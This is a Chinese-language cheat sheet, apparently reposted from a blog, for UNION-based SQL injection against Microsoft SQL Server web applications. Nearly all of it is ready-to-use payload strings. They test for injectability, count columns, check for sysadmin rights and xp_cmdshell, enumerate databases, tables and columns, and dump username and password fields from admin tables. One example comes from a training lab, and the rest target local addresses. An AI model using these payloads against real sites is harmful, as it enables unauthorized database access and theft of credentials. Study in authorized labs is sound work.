本章目录：

• 联合查询注入语句
• • 利用回显点权限判断
  • • 查库：
    • 查表：
    • 查列名：
    • 查列内容：
• 联合注入例：

联合查询注入语句

• 第一步 判断注入

  and 1=1

  and 1=2

• 第二步 猜解列数（字段长度）

  order by 1 返回正确

  order by 2 返回正确

  order by 3 出现错误

  ?id=-2union all select null,null,null,null--
  //在第四个的时候页面显示正常，说明字段为4

  ?id=2and 1=(select is_srvrolemember(‘sysadmin’))
  //判断是否是系统管理员

  ?id=2and 1=(select is_srvrolemember(‘db_owner’))
  //判断是否是库权限

  ?id=2and 1=(select is_srvrolemember(‘public’))
  //判断是否为public权限

  可以直接不用加 - 报错

  判断回显位的位置：?id=-2union all select ‘1’,‘2’,‘3’,‘4’-- 页面显示2，3，说明回显点为2，3字段处

利用回显点权限判断

?id=-1073UNION ALL SELECT NULL, 回显点 ,NULL,NULL--
//一般都是代入在这语句的回显点中

其实这里面在后面添加的--或者#是因为代入数据库查询的时候系统可能会给你附加一些语句，这些语句都有可能会影响你的代码，所以就可以加这个注释掉。

• @@version //主机版本

• system_user //系统用户名

• suser_sname() //查出当前操作数据库的登入名

• user //当前用户名

• db_name() //当前数据库名

  db_name(7) //快速查询库名，1-6为系统库，7开始为其他库

• (select host_name()) //主机名

• (select count(*) from master.dbo.sysobjects where xtype=‘X’ and name=‘xp_cmdshell’)

//判断是否有xp_cmdshell扩展存储，1为存在

• 同理：(select count(*) from master.dbo.sysobjects where name=‘xp_regread’)

//判断是否有xp_regread扩展存储，1为存在

查库：

• (select name from master.dbo.sysdatabases where dbid=7)
  //修改dbid数值，快速查询库名，1-6为系统库

查表：

• (select top 1 name from sysobjects where xtype=‘U’) //查询当前库第一个表名

• (select top 1 name from sysobjects where xtype=‘U’ and name not in (‘表名1’,‘表名2’)) //查询其他表

• (select top 1 table_name from master.@R_596_4045@ion_schema.tables) //查询master库第一个表名

• (select top 1 name from bbs.dbo.sysobjects where xtype=‘U’) //查询bbs库第一个表名

• (select top 1 table_name from @R_596_4045@ion_schema.tables where table_name not in (‘表名1’,‘表名2’)) //查询其他表（不包括）

• (select name from sysobjects where xtype=‘U’ FOR XML PATH(’’)) //快速查询所有表

• (select ‘|’%2bname%2b’|’ from sysobjects where xtype=‘U’ FOR XML PATH(’’)) //快速查询所有表

同上一条，这是过滤用的，将空格编码化了

• (select top 1 name from sysobjects where xtype=‘U’ and name not in(select top 0 name from sysobjects where xtype=‘u’))
  ///(select top 0 name from ) 变化0来快速查询

墨者学院例,查表名：
?id=-1073UNION ALL SELECT NULL,(SELECT TOP 1 TABLE_NAME FROM @R_596_4045@ION_SCHEMA.TABLES WHERE TABLE_SCHEMA=‘dbo’),NULL,NULL--
//结果：manage

查列名：

• (select top 1 name from syscolumns where id=object_id(‘admin’))
  //查询当前库admin表的第一个列名

• (select top 1 name from syscolumns where id=object_id(‘admin’) and name not in(‘列名1’,‘列名2’)
  //查询当前库admin表的其他列名（也是不包括原理）

• (select top 1 column_name from @R_596_4045@ion_schema.columns where table_name=‘admin’ and column_name not in(‘列名1’,‘列名2’))
  //查询当前库admin表的其他列名

• (select name from syscolumns where id=object_id(‘admin’) FOR XML PATH(’’))
  //快速查询所有列

例：
?id=-2union all select ‘1’,(select top 1 col_name(object_id(‘manage’),3) from sysobjects),‘1’,‘1’--
//根据col_name()函数中的数字来决定显示的字段，1对应id，2对应username，3对应password

查列内容：

例：

• ?id=-2union all select null,username,password,null from manage--
  ///直接代列名到回显点里面，然后from 表名--

• (select password,username from manage FOR XML PATH(’’))
  //快速查询manage表里所有值

• (select top 1 password from admin where password not in (‘值1’,‘值2’))
  //查询其他值

• (select top 1 password from bbs.dbo.admin)
  //查询bbs库admin表password列的第一个值

-----------------------------------------------------------------------------------------------------------------

联合注入例：

mssql联合注入我们一般不使用 数字占位，而是null，因为你使用数字占位可能会发生隐式转换

http://192.168.130.137/1.aspx?id=1 union select 1,2,3

http://192.168.130.137/1.aspx?id=1 union select null,name,pass from info

当然也可以这样用

http://192.168.130.137/1.aspx?id=1 SELECT 1 UNION (select CAST(USER as int))

在mssql中我们如果想查询多条数据可以使用%2B 也就是加号

http://192.168.130.137/1.aspx?id=1 union select null,name%2Bpass,null from info

版权声明：本文内容由互联网用户自发贡献，该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容， 请发送邮件至 [email protected] 举报，一经查实，本站将立刻删除。